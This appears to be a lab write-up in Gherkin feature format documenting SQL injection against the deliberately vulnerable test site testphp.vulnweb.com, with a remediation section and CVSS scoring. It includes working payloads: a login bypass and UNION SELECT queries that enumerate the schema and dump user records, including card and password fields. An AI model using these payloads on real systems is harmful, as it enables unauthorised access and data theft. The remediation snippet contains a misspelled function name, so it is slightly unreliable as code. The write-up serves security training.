## Version 1.4.1
## language: en

Feature:
  TOE:
   Acuart
  Location:
   http://testphp.vulnweb.com - username or password (field)
  CWE:
   CWE-0089: Improper Neutralization of Special Elements used in an SQL Command
  Rule:
   REQ.173 Discard unsafe inputs
  Goal:
   Detect and exploit vuln Insecure SQL query input
  Recommendation:
   Use parameterized queries with known tools

  Background:
    Hacker's software:
     | <Software name> | <Version>     |
     | Kali Linux      | 2020.3        |
     | Firefox         | 68.10.0esr    |
     | SSH             | OpenSSH_8.3p1 |
  TOE information:
    Given I am accessing the site http://testphp.vulnweb.com
    And Entered a PHP site which uses SQL requests

  Scenario: Normal use case
    Given I access to http://testphp.vulnweb.com/
    When I click on "signup"
    Then I access to http://testphp.vulnweb.com/login.php/
    And I can see a login form

  Scenario: Static detection
    When I open the source code of the page from the browser inspector
    Then I can see that form tag uses the POST method from "userinfo.php"
    And it is not possible to access to the source code PHP of this file
    Then I can't find possible vulnerabilities in that file

 Scenario: Dynamic detection
    Given I access to http://testphp.vulnweb.com/login.php/
    When I write the following SQL syntax only in username field
    """
    ' or 1=1 --
    """
    Then I can't log in successfully
    When I write the following SQL syntax only in username field
    """
    ' or 1=1 #
    """
    Then I can log in successfully without a valid username and password
    And this it can be seen in [evidence](img1.png) and [evidence](img2.png)
    Then I conclude that can I do SQLi and that the database could be MySql
    And I conclude this because can comment the sql instructions with "#"
    Given https://cutt.ly/HhhTD72 I can see that "#" working only in MySql
    When I update a user info with a "'" as can see in [evidence](img3.png)
    Then I get SQL syntax error
    And it can be seen that the database is MySql [evidence](img4.png)

  Scenario: Exploitation
    Given I access to http://testphp.vulnweb.com/login.php/
    When I write the following SQL syntax only in username field
    """
    ' union select (select schema_name from information_schema.schemata
       limit 1 offset 1),2,3,4,5,6,7,8 #
    """
    Then I can see the database name as can see in [evidence](img5.png)
    When I write the following SQL syntax only in username field
    """
    ' union select (select schema_name from information_schema.schemata
       limit 1 offset 1),2,3,4,5,(select GROUP_CONCAT(table_name)
       from information_schema.tables WHERE table_schema='acuart'),7,8 #
    """
    Then I can see the tables from acuart database
    And this it can be seen in [evidence](img6.png)
    When I write the following SQL syntax only in username field
    """
    ' union select (select schema_name from information_schema.schemata
       limit 1 offset 1),2,(select GROUP_CONCAT(column_name)
       from information_schema.columns where table_name='users'),4,5,
       (select GROUP_CONCAT(table_name) from information_schema.tables
       WHERE table_schema='acuart'),7,8 #
    """
    Then I can see the attributes from users table
    And this it can be seen in [evidence](img7.png)
    When I write the following SQL syntax only in username field
    """
    ' union select (select schema_name from information_schema.schemata
       limit 1 offset 1),2,(select GROUP_CONCAT(column_name)
       from information_schema.columns where table_name='users'),4,
       (select concat(address, ",", cart, ",", cc, ",", email, ",",
       name, ",", pass, ",", phone, ",", uname) from users limit 1),
       (select GROUP_CONCAT(table_name) from information_schema.tables
       WHERE table_schema='acuart'),7,8 #
    """
    Then I can see the data of the first record of the users table
    And this it can be seen in [evidence](img8.png)

  Scenario: Remediation
    When Use parameterized queries in the back
    Then the program can succesfully avoid most of the known SQLi
    Given know that the site is PHP and database is MySql
    Then can use MySqli as tools of parameterized queries
    And can seen a example in the following line
    """
    ...
    $sql = "SELECT email FROM users WHERE username = ? AND password = ?"
    $sqlQuery = mysqli_prepare($connection, $sql);
    $result = mysqli_stmt_bind_param($sqlQuery, "ss", $userValue, $passValue);
    $result = msqli_stmt_execute($sqlQuery);

    if ($result) {
      $result = mysqli_stmt_bind_result($sqlQuery, $email);
      if(mysqli_stmt_fetch($sqlQuery)) {
        echo $email;
      }
    }
    ...
    """

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    10/10 (Critical) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.5/10 (Critical) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    9.5/10 (Critical) - CR:M/IR:H/MC:H/MI:H/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2020-11-25
